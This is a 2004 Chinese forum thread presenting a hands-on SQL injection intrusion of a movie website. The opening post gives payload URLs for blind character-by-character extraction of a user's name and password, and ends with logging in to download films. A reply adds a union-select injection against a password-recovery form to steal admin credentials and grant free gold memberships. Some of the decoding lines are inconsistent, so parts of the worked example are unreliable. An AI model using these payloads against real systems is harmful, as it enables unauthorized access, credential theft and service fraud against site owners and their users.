温柔网

 找回密码
 注册

查看: 727|回复: 1

SQL注入网站入侵实例

[复制链接]
发表于 2004-6-1 21:31:03 | 显示全部楼层 |阅读模式
受影响系统:

漏洞描述:
1.寻找入口
准备:如果你以前没尝试过SQL注入攻击,那应该把HTTP友好提示关闭,这样才能让你清楚看到服务器端返回的提示信息。
尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个'号,或在表单输入'号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。
经测试,发现有几个页面有注入漏洞,决定从http://www.movie.com/movie.asp?ID=1000入手,输入http://www.movie.com/movie.asp?ID=1000',得到信息:数据库用是的ACCESS,提示ArticleID=1000'附近有表达式错误,嘿,原来是个用文章系统改出来的电影站。

2.观察网站环境
网站提供的功能有:影片分类、影片介绍、影片搜索,影片的ID大概从1000-1500之间。

3.猜表名
查清楚敌人情况之后,开始行动,行动的第一步都是从猜表名开始,http://www.movie.com/movie.asp?ID=1000,把1000改成(select count(1) from user),那么,他原来的SQL语句将会变成:
Select [字段列表] from [影片表] where 影片ID=(select count(1) from user)
如果猜对表名,将有可能出现下面三种情况:
A.显示某部影片的信息(巧合的情况)
B.显示影片找不到(如果有判断是否为EOF)
C.提示错误信息(EOF OR BOF)
如果猜错,将会直接提示找不到表名。
把user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu这些常用表名一个个放进去试,一般成功率都不低于80%
结果,成功猜中该网站的用户名表名为users

4.猜列名
至于猜列名,不用我介绍大家都应该清楚怎么做了,把(select count(1) from users)改成(select count(id) from users),如没提示"找不到字段"就表示字段名是正确的,字段一般不用太费力,在Login的时候看看表单的名称就大概可以猜到一些了。
果然,这个网站也不例外,用户表中字段为ID(数字),UserID(文本),Password(文本),积分字段猜得比较费劲,为money

5.锁定目标
让users表只返回money最多的一个记录,以便进行猜解、并避免猜中一些没money的用户名:
http://www.movie.com/movie.asp?ID=(select 1000 from user where money>1000) 结果:提示子查询不能返回两条以上记录
锁定>10000,提示不变;
锁定>100000,提示找不到记录,说明没有积分大于10万的用户;
从1万到10万逐步缩小范围,得知积分大于25500只有一条记录。

6.计算用户名及密码长度
因为影片的ID大概从1000-1500之间,可以用UserID的长度+1000得出的数(即影片ID)计算用户名长度,键入:
http://www.movie.com/movie.asp?ID=(select len(UserID) %2B 1000 from user where money>25500)

%2B是什么?因为地址栏的+号request出来会变成空格,所以+号要用UrlEncode过的%2B表示。

结果返回片名为《双雄》的影片,呵呵,怎么办?不是有搜索功能吗?拿去搜一下,看看影片ID是多少吧。
搜索,得出影片ID是1006,显然,用户名长度为1006-1000=6;同样方法,得出密码的长度为8

7.分步破解用户名
有点SQL应用经验的人应该都想到方法了,来,敲入:
http://www.movie.com/movie.asp?ID=(select asc(mid(UserID,1,1)) %2B 1000 from user where money>25500)
呵呵,又返回一部影片,搜索一下,影片ID为1104,即asc(mid(UserID,1,1))=104
同样方法,得出:
asc(mid(UserID,2,1))=117
asc(mid(UserID,3,1))=97
asc(mid(UserID,4,1))=106
asc(mid(UserID,5,1))=105
asc(mid(UserID,6,1))=101
因为len(UserID)=6,所以算到第6位就行了,查asc对应表(会编程的可以写几句话算出来),chr(104)=h,chr(117)=u,chr(97)=a,chr(106)=j,chr(105)=i,chr(101)=e
连起来,用户名就是huajie

8.同样的方法破解密码
asc(mid(Password,1,1))=49 => chr(49)=1
asc(mid(Password,2,1))=57 => chr(49)=9
asc(mid(Password,3,1))=55 => chr(49)=7
asc(mid(Password,4,1))=56 => chr(49)=8
asc(mid(Password,5,1))=48 => chr(49)=0
asc(mid(Password,6,1))=55 => chr(49)=7
asc(mid(Password,7,1))=55 => chr(49)=1
asc(mid(Password,8,1))=55 => chr(49)=2
拼起来:19780712,哈哈,又是用生日做密码的!


接下来,输入用户名和密码,登录系统,成功!猜表名列表之前用了30分钟,破解用了15分钟,45分钟搞掂了一个站。接下来做什么?当然是先Down几G的电影下来再说了。
 楼主| 发表于 2004-6-1 21:32:06 | 显示全部楼层

SQL注入网站入侵实例

其实最简单的破解电影网站的方法呢``就真的很简单``

一部分电影网站的找回密码页面为www.xxx.com/user/wantpws.asp

或在首页能找到入口,

然后呢,在用户名和提示问题处添一样的字母,比都都添A

在答案中添a 'union select name from okwiantgo where id>=1 or '0

提交后得到如果你忘记了自己的密码,请在如下表单里输入你的密码提示信息!


你的密码是:123456

要保存好喔,下次不要弄丢了。



 但是这不是密码,这只是用户名,再后退,在答案里面添a 'union select pwd from okwiantgo where id>=1 or '0

得到如果你忘记了自己的密码,请在如下表单里输入你的密码提示信息!


你的密码是:19851214

要保存好喔,下次不要弄丢了。



呵呵,笨蛋用生日做密码,这就是密码了,

有了用户名和密码呢,就猜测管理页面,这个的呢,正好是login.asp

一登,就进后台了,想开多少个黄金会员随你便``

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|温柔网 ( 浙ICP备13033583号-8 )

GMT+8, 2024-11-21 19:46 , Processed in 0.038121 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表